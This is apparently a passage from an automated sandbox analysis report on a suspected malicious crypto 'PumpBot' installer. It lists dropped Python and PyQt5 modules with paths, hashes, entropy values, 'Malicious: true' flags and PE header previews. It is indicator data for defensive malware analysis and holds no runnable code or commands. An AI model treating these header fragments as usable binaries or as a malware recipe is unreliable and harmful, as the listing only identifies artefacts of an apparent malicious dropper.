Encrypted:	false
SSDEEP:	24576:C4hCESnLroNJ+SKIP9H85yy8zm4nrH4k3wJjUakWurUoMd/UZ1ZhAdQXlOl4pImZ:CeC1LMnf9H5y8q4zAhkZrUoxXlO4pIR
MD5:	4FD79F7BD1642638C547A240854D8848
SHA1:	AD0DE52E06772CC568F7382ADCEF9FD50866BE8A
SHA-256:	F0845A8C00C6ECE2F58B1088FC09F3AF0E6A1EA783B4922497C8675212685F23
SHA-512:	EB0BD0102E596BED42CF32D94CBE1BFF11BE9919E876A1A611E250C211843BB226F36059318190AF56FD9962D33EB22CC3AA52C5FABDBC102B717C8E674920A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........8.d.Y.7.Y.7.Y.7.!{7.Y.7.%.6.Y.7.!.6.Y.7.%.7.Y.7.%.6.Y.7.%.6.Y.7.%.6.Y.7{,.6.Y.7.Y.7*Y.7f$.6.Y.7f$.6.Y.7f$.6.Y.7f$.6.Y.7f$.7.Y.7f$.6.Y.7Rich.Y.7................PE..d...d).d.........." ...#.....T......`.....................................................`..........................................5..d...t5.......`.......p...............p..........................................@...............H............................text...H........................... ..`.rdata...D.......F..................@..@.data........P......................@....pdata.......p.......D..............@..@_RDATA..0....P......."..............@..@.rsrc........`.......$..............@..@.reloc.......p.......&..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_webp.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	532480
Entropy (8bit):	6.582042297988443
Encrypted:	false
SSDEEP:	12288:AyLlHZpSfhb7f2Lc9LrLrLrLFmTx158nAyzMSJz:AMIfhb9LrLrLrLFm3CAo9J
MD5:	4225D8FDB913D314538AB8E95D248694
SHA1:	06E2C62BC0B5B23453E8B19ABB85F624FB3D8AF8
SHA-256:	8C62BCCF01BEFA1F30592E18201B9ACFF9C09E38F900270F48488CD19DF4A9CA
SHA-512:	D37E7F7939152E92327C1C5B57CFDBB344D7033BEB1301E89F987BD474F3E5E93DF74A1D2D797F2ED2BABE73F38A6BD9B597EF5554DB83384F848558B9555013
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..{ku.(ku.(ku.(b.z(au.(...)iu.( ..)iu.(...)fu.(...)cu.(...)ou.(...)hu.(ku.(8u.(...)=u.(...)ju.(...)ju.(...(ju.(...)ju.(Richku.(........PE..d...i).d.........." ...#..................................................................`.............................................\............p....... ..\|M.................. W...............................U..@............................................text...X........................... ..`.rdata..............................@..@.data....2..........................@....pdata..\|M... ...N..................@..@.rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtCore.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2467840
Entropy (8bit):	6.240133820704683
Encrypted:	false
SSDEEP:	49152:aWYt+wPbTcSKSCcHFpXEqzhDarD9HDXTk5am3QSQK4ZAzYI+1ZdAEDGmtV/U3bwN:jSKSCcHFpXEqzhDarD9HDXTk5am3QSQO
MD5:	1DA7B606380B624274E7E3C5F25209BC
SHA1:	695949EAB1548E05FB10DA421626EF95B03D5B89
SHA-256:	203BB6236F23F57AD8CDAB5BBF4537A4ABBC0B0879CF2893A8DC930E679DD846
SHA-512:	43E4CDE7B3CF2F57991C169B1B9AD90334187A41B7784F37660D146252B1C6BD2E98CF86210F938967653773F29619CF0CE038A99184E3D44F734223D05C0B93
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........^..0..0..0.....0...1...0...1...0...5..0...4..0...3..0.M.1...0.E.1...0..1.!.0...5..0...0..0...2..0.Rich.0.........................PE..d...3..c.........." .....B..........HF........................................&...........`.............................................L...L.................#..............`%.....`.......................b..(....`..8............`...o...........................text....A.......B.................. ..`.rdata...o...`...p...F..............@..@.data...(...........................@....pdata........#......<#.............@..@.reloc......`%.......%.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtGui.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2482688
Entropy (8bit):	6.233473435581707
Encrypted:	false
SSDEEP:	49152:eq1Bdy8kK+zqwXSkaGV0COyxNkFAEfYoyWbP:dLdiznbTjO
MD5:	3A9A1CD6F3A0EFE67B5994B82D7C4E21
SHA1:	E4009EB322A235C7B739777B4385906A238E7B37
SHA-256:	2CA28D29EC4F2F50B4CCC70C7D6399B314151BC38852833D2D30097773BB1C00
SHA-512:	13BCA36D9BFBE7AD6B43818E5AFC4FF940ADCCC8273DB00052B1466339258C4A0D47B2E126278F43CB24A0E608A08CF39A92379375CE011E156DE1546A286C15
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........wE.S.+OS.+OS.+OZn.OW.+O.cNQ.+O.~NQ.+O.c.NG.+O.c/N[.+O.c(NP.+O.mNQ.+O.fNV.+OS.*O..+O.c.NX.+O.c+NR.+O.c)NR.+ORichS.+O........................PE..d...R..c.........." .........J...............................................@&...........`.............................................L...L.................#...............%.....`...................................8................z...........................text............................... ..`.rdata..V...........................@..@.data...(z...p...^...N..............@....pdata........#.......#.............@..@.reloc........%.......%.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtWidgets.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5092864
Entropy (8bit):	6.251608446485404
Encrypted:	false
SSDEEP:	49152:I6qnQByIoLSo7MMVjv7pekxL3UNmN61ZA+gca6xSdJzqNQ9SbBanj1Mxf5uJa:WxI/kMaz7YsgNDG90+VimCOa
MD5:	9E4B668C64D9E7A6C59BEBE4B0D6D7C0
SHA1:	75C70834E631014296F893F5584B18EA20AC1EC3
SHA-256:	E4A06FE65B02C568DB984771FB9A46EA95A8E4353EA85C942F954CBA02DEC635
SHA-512:	8D18D5F640EFE4631E4E43A1EF4BB458613C598C88574DC3C3BCFA8C0B8C7CBBF4950CF6F6BB31B49914DC45523A2376AC9178939164D93BDDD670BAD5386D66
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0...^..^..^.....^..._..^..._..^...[..^...Z..^...]..^..._..^..._..^.._..^.X.[..^.X.^..^.X.\..^.Rich..^.................PE..d...m..c.........." ......,...!.......,.......................................N...........`..........................................t;.T...Du;..............0H..t............L..O...7..............................7.8.............,.`............................text...(.,.......,................. ..`.rdata..F.....,.......,.............@..@.data....9....@.......@.............@....pdata...t...0H..t....G.............@..@.reloc...O....L..P...fL.............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\sip.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	121856
Entropy (8bit):	6.010014326553868
Encrypted:	false
SSDEEP:	1536:mKiN0i1GmLV0IBclvyZab28IubHzyB696QtB493U2WRxDhzXP+Na4fa2:NOEgqIBdZab2a196Qs93UT9zXPWhfa2
MD5:	4279AAB23F58BE0716A1C92B96E7C500
SHA1:	A94F542D78B68B7F9A3DC4FD226A389AFA93AEB9
SHA-256:	39DA2371E3B7F118B27928AFCB7948DFB6936180CCF870A7E0515FF29DDD3326
SHA-512:	39E51EB99126F4D9FD7EDD5144994D5F98F73164969BC0F11E6717EF979A0AE6B95855750486842BA5CAE14566D4979641A1CF103ACADCE6601D06BFFE321315
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................3.................................................i.....i.....i._.....i.....Rich....................PE..d...f..d.........." .....P...........S.......................................0............`.............................................X.................................... ......`...................................8............`...............................text....N.......P.................. ..`.rdata...S...`...T...T..............@..@.data...0 ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_brotli.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	820736
Entropy (8bit):	6.056282443190043
Encrypted:	false
SSDEEP:	12288:tY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfRFo:tp0NA1tAmZfR
MD5:	EE3D454883556A68920CAAEDEFBC1F83
SHA1:	45B4D62A6E7DB022E52C6159EEF17E9D58BEC858
SHA-256:	791E7195D7DF47A21466868F3D7386CFF13F16C51FCD0350BF4028E96278DFF1
SHA-512:	E404ADF831076D27680CC38D3879AF660A96AFC8B8E22FFD01647248C601F3C6C4585D7D7DC6BBD187660595F6A48F504792106869D329AA1A0F3707D7F777C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.r.q...q...q...x...y......s...:...s......\|......y......r.....r...q...L.....Q.....p.....p.....p...Richq...........PE..d... ..d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	80112
Entropy (8bit):	6.4309989963681105
Encrypted:	false
SSDEEP:	1536:owz7h8B7BjhJCZePYgIjFNf8AnZydTBIAMVyyw:owz18BrJCJgIHEAodTBIAMVy
MD5:	B45E82A398713163216984F2FEBA88F6
SHA1:	EAAF4B91DB6F67D7C57C2711F4E968CE0FE5D839
SHA-256:	4C2649DC69A8874B91646723AACB84C565EFEAA4277C46392055BCA9A10497A8
SHA-512:	B9C4F22DC4B52815C407AB94D18A7F2E1E4F2250AECDB2E75119150E69B006ED69F3000622EC63EABCF0886B7F56FFDB154E0BF57D8F7F45C3B1DD5C18B84EC8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..>...m...m...m..=m...mQ..l...me.Sm...mQ..l...mQ..l...mQ..l...m...l...m...l...m...m\..m...l...m...l...m..Qm...m...l...mRich...m................PE..d....O[a.........." .........^...............................................P............`.............................................H............0....... ..,............@......`...T...............................8............................................text...U........................... ..`.rdata..\>.......@..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_cffi_backend.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181248
Entropy (8bit):	6.191174351377468
Encrypted:	false
SSDEEP:	3072:fp5LZ3sgWSqjfy8dBbm/6WnUsHozssS7piSTLkKyS7TlSyQH:fptZ8gW9jrBbQnfIzLIiSTLLymlSy
MD5:	6F1B90884343F717C5DC14F94EF5ACEA
SHA1:	CCA1A4DCF7A32BF698E75D58C5F130FB3572E423
SHA-256:	2093E7E4F5359B38F0819BDEF8314FDA332A1427F22E09AFC416E1EDD5910FE1
SHA-512:	E2C673B75162D3432BAB497BAD3F5F15A9571910D25F1DFFB655755C74457AC78E5311BD5B38D29A91AEC4D3EF883AE5C062B9A3255B5800145EB997863A7D73
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C...B...C...B...C...C..C...B...C..HC...C...B...C.."C...C...B...CRich...C........PE..d...o.b.........." .........@...............................................0............`..........................................g..l...\|g..................H............ .......M...............................M..8............................................text...H........................... ..`.rdata..............................@..@.data....\.......0...v..............@....pdata..H...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120040
Entropy (8bit):	5.921989765012805
Encrypted:	false
SSDEEP:	3072:SHcKPoHQUCFN1KQDCVPJGltBfrShpl7PFIABPI:ShP0ChjCxJGl3frSVzo
MD5:	79F339753DC8954B8EB45FE70910937E
SHA1:	3AD1BF9872DC779F32795988EB85C81FE47B3DD4
SHA-256:	35CDD122679041EBEF264DE5626B7805F3F66C8AE6CC451B8BC520BE647FA007
SHA-512:	21E567E813180ED0480C4B21BE3E2E67974D8D787E663275BE054CEE0A3F5161FC39034704DBD25F1412FEB021D6A21B300A32D1747DEE072820BE81B9D9B753
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......XP...1a..1a..1a..I..1a.ND`..1a.NDd..1a.NDe..1a.NDb..1a..D`..1a..Ze..1a..Z`..1a..X`..1a..1`..1a..Dl..1a..Da..1a..D...1a..Dc..1a.Rich.1a.................PE..d....O[a.........." .................[....................................................`.........................................0Q.......Q..........................................T...........................0...8...............@............................text...d........................... ..`.rdata...l.......n..................@..@.data...T>...p...8...`..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	247528
Entropy (8bit):	6.5130349256035975
Encrypted:	false
SSDEEP:	6144:xJADMQRl2npdNqRb8o+wmxYk29qWMa3pLW1ALH+4t4g3:IDMQ2Nqi02/U/+g3
MD5:	1CDD7239FC63B7C8A2E2BC0A08D9EA76
SHA1:	85EF6F43BA1343B30A223C48442A8B4F5254D5B0
SHA-256:	384993B2B8CFCBF155E63F0EE2383A9F9483DE92AB73736FF84590A0C4CA2690
SHA-512:	BA4E19E122F83D477CC4BE5E0DEA184DAFBA2F438A587DD4F0EF038ABD40CB9CDC1986EE69C34BAC3AF9CF2347BEA137FEEA3B82E02CCA1A7720D735CEA7ACDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..P..P..P.....P...Q..P...U..P...T..P...S..P.Q.Q..P...Q..P..Q...P.Q.S..P.Q.]..P.Q.P..P.Q...P.Q.R..P.Rich.P.................PE..d....O[a.........." .....r...:............................................................`..........................................T..P...@U...................'..............<... ...T...............................8............................................text...)q.......r.................. ..`.rdata...............v..............@..@.data....)...p...$...N..............@....pdata...'.......(...r..............@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_elementtree.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122088
Entropy (8bit):	6.32131712548972
Encrypted:	false
SSDEEP:	3072:Mx2ad4Xjfa7B5RQo/jmISgUjeuvZpmn9iPfxrrNobnxIAkf+:pm7B5RNiISgShKQxtobnz
MD5:	1FECAC327FC93FC161833AD709336BBB
SHA1:	C755ED4FF97EB2F1C73659322430C60DE253B732
SHA-256:	16480EDE0430BE5249481A9BFB843EB0EF98F93B467A5428352FC23CC8C9051D
SHA-512:	003D9CCDCB68F5876AAD4CB39FECFEFD043E70D1FD6CCFD4D672924AE96D69EB4F32DFCD1A643B3A60F0A60C051714C64436E0F6D09A784DD2F92B0800BCA067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0.j.0.j.0.j.9...>.j.b.k.2.j.b.o.<.j.b.n.8.j.b.i.3.j..k.2.j.$.k.3.j.0.k.j..g.4.j..j.1.j...1.j..h.1.j.Rich0.j.........PE..d....O[a.........." .....$...........x....................................................`.............................................X.......x...............................P....I..T............................J..8............@...............................text....#.......$.................. ..`.rdata...g...@...h...(..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59112
Entropy (8bit):	6.088455033709072
Encrypted:	false
SSDEEP:	768:13RNYlTw3glkXa/bNnVXP5ZV17reFyPXS9aEyp6fZIAYIPVDG4ywh2:2TRiXa/bNFLVFPXS93fZIAYI3yz
MD5:	CFB9E0A73A6C9D6D35C2594E52E15234
SHA1:	B86042C96F2CE6D8A239B7D426F298A23DF8B3B9
SHA-256:	50DAEB3985302A8D85CE8167B0BF08B9DA43E7D51CEAE50E8E1CDFB0EDF218C6
SHA-512:	22A5FD139D88C0EEE7241C5597D8DBBF2B78841565D0ED0DF62383AB50FDE04B13A203BDDEF03530F8609F5117869ED06894A572F7655224285823385D7492D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.................m.....B.......B.......B.......B.....................F......................................Rich....................PE..d....O[a.........." .....R...z......`>....................................................`.........................................P...P............................................y..T............................y..8............p..x............................text....P.......R.................. ..`.rdata...M...p...N...V..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	153320
Entropy (8bit):	6.800724697808258
Encrypted:	false
SSDEEP:	3072:3o6xxrSqs+vs0H0q8bnpbVDbX5AyYCznfo9mNomenNjc3KBIAD15:3o6DrScRLCV3twYOmUQKt
MD5:	5A77A1E70E054431236ADB9E46F40582
SHA1:	BE4A8D1618D3AD11CFDB6A366625B37C27F4611A
SHA-256:	F125A885C10E1BE4B12D988D6C19128890E7ADD75BAA935FE1354721AA2DEA3E
SHA-512:	3C14297A1400A93D1A01C7F8B4463BFD6BE062EC08DAAF5EB7FCBCDE7F4FA40AE06E016FF0DE16CB03B987C263876F2F437705ADC66244D3EE58F23D6BF7F635
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.h...h...h.......h.......h.......h.......h.......h..+....h.......h...h...h..+....h..+....h..+....h..+....h..Rich.h..........PE..d....O[a.........." .....^...........2..............................................`d....`......................................... ...L...l...x....`.......@.......:.......p..D...H{..T............................{..8............p...............................text....].......^.................. ..`.rdata......p.......b..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`......................@..@.reloc..D....p.......8..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	6.111826139660432
Encrypted:	false
SSDEEP:	384:ztfqkQfrUC+qFYS9F6N76r1PSMYpKnHgEFIAmUJDG4y8YSNhJl:zOrUC+Us6r1PSMjFFIAmUJDG4y4hP
MD5:	C9EE37E9F3BFFD296ADE10A27C7E5B50
SHA1:	B7EEE121B2918B6C0997D4889CFF13025AF4F676
SHA-256:	9ECEC72C5FE3C83C122043CAD8CEB80D239D99D03B8EA665490BBCED183CE42A
SHA-512:	C63BB1B5D84D027439AF29C4827FA801DF3A2F3D5854C7C79789CAD3F5F7561EB2A7406C6F599D2AC553BC31969DC3FA9EEF8648BED7282FBC5DC3FB3BA4307F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a..}...}...}.......}......}......}......}......}..s....}.......}...}..}..s....}..s....}..s....}..s....}..Rich.}..........PE..d....O[a.........." .........8.......................................................w....`..........................................C..L....C..d....p.......`.......N...............3..T...........................p3..8............0.. ............................text...*........................... ..`.rdata.......0......................@..@.data........P.......:..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	74472
Entropy (8bit):	6.119165103878181
Encrypted:	false
SSDEEP:	1536:LmtpT7zWHzDfLrAe9/s+S+pBm/es6FIABwNyi:qTnzWzrAe9/sT+pBm/X6FIABwp
MD5:	5DD51579FA9B6A06336854889562BEC0
SHA1:	99C0ED0A15ED450279B01D95B75C162628C9BE1D
SHA-256:	3669E56E99AE3A944FBE7845F0BE05AEA96A603717E883D56A27DC356F8C2F2C
SHA-512:	7AA6C6587890AE8C3F9A5E97EBDE689243AC5B9ABB9B1E887F29C53EEF99A53E4B4EC100C03E1C043E2F0D330E7AF444C3CA886C9A5E338C2EA42AAACAE09F3E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......BV...7...7...7...Og..7..TB...7..TB..7..TB..7..TB...7...B...7...\...7...7...7...B...7...B...7...B...7...B...7..Rich.7..........................PE..d....O[a.........." .....l...........%.......................................P............`.............................................P............0....... ..<............@..........T..............................8............................................text...Vj.......l.................. ..`.rdata...s.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_sqlite3.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	93416
Entropy (8bit):	6.082968229829419
Encrypted:	false
SSDEEP:	1536:6WRj/57JzRFSbiSBYNdS4JkFTH57GlrpD5T82SXEv/cttngyB+HmTq0eZIAYQikX:bRj51g7YNwIkpHsfD5Q2SXttgyB4zZII
MD5:	6486E5C8512BDDC5F5606D11FE8F21E0
SHA1:	650861B2C4A1D6689FF0A49BB916F8FF278BB387
SHA-256:	728D21BE4D47DD664CAF9FA60C1369FE059BC0498EDD383B27491D0DEE23E439
SHA-512:	F2C9267A3CAB31190079037E3CC5614F19C1235852454708C4978008EA9DA345892191750980AEBC809CC83DD1F5788B60F8CF39A6A41623210C96AF916D1821
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V7F.8dF.8dF.8dO.d@.8d..9eD.8d ..dG.8d..=eJ.8d..<eN.8d..;eE.8d..9eC.8dR.9eD.8dF.9d..8d..5eO.8d..8eG.8d...dG.8d..:eG.8dRichF.8d........................PE..d....O[a.........." .................................................................b....`.............................................P............p.......P..\....P..........\|...D...T...............................8...............H............................text...`........................... ..`.rdata...n.......p..................@..@.data...,....0......................@....pdata..\....P......................@..@.rsrc........p.......B..............@..@.reloc..\|............L..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	155880
Entropy (8bit):	5.928662213847181
Encrypted:	false
SSDEEP:	3072:wYb/EGIexVYBgWHaCJaLuJ3TE8sOGH70NmHh4kwooSLteSdo9QBIAM73:wY7jIexVYKUazuJMOADtho9QO
MD5:	11C5008E0BA2CAA8ADF7452F0AAAFD1E
SHA1:	764B33B749E3DA9E716B8A853B63B2F7711FCC7C
SHA-256:	BF63F44951F14C9D0C890415D013276498D6D59E53811BBE2FA16825710BEA14
SHA-512:	FCEB022D8694BCE6504D6B64DE4596E2B8252FC2427EE66300E37BCFF297579CC7D32A8CB8F847408EAA716CB053E20D53E93FBD945E3F60D58214E6A969C9DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..w&.w&.w&....w&...'.w&...#.w&...".w&...%.w&.%.'.w&...'.w&..'.w&.w'..v&.%.+.w&.%.&.w&.%...w&.%.$.w&.Rich.w&.................PE..d....O[a.........." ................l*..............................................2p....`............................................d...4........`.......P.......D.......p..8.......T...............................8...............x............................text...T........................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P....... ..............@..@.rsrc........`.......,..............@..@.reloc..8....p.......6..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_tkinter.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61680
Entropy (8bit):	6.0571552274672635
Encrypted:	false
SSDEEP:	768:e9k8DRvbV/VKfBvrUx/l93WDtbBZeaWDyms5fTabInhkz0/AAZIAYSADG4yI8h:e1RvtV+BcAeaas5fuUnheurZIAYSMy
MD5:	0F1AA5B9A82B75B607B4EAD6BB6B8BE6
SHA1:	5D58FD899018A106D55433EA4FCB22FAF96B4B3D
SHA-256:	336BD5BFFDC0229DA4EADDBB0CFC42A9E55459A40E1322B38F7E563BDA8DD190
SHA-512:	B32EA7D3ED9AE3079728C7F92E043DD0614A4DA1DBF40AE3651043D35058252187C3C0AD458F4CA79B8B006575FAC17246FB33329F7B908138F5DE3C4E9B4E52
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,...h{.Gh{.Gh{.Ga..Gn{.G:..Fj{.G:..Fd{.G:..F`{.G:..Fk{.G...Fj{.G\|..Fj{.G...Fm{.Gh{.G.{.G...Fj{.G...Fi{.G..rGi{.G...Fi{.GRichh{.G................PE..d....O[a.........." .....l...j......................................................<.....`............................................P... ...................,...............$.......T...............................8............................................text....j.......l.................. ..`.rdata...B.......D...p..............@..@.data...............................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\certifi\cacert.pem

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	281617
Entropy (8bit):	6.048201407322743
Encrypted:	false
SSDEEP:	6144:QW1H/M8fRR1mNplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5f:QWN/TR8NLWURrI55MWavdF0f
MD5:	78D9DD608305A97773574D1C0FB10B61
SHA1:	9E177F31A3622AD71C3D403422C9A980E563FE32
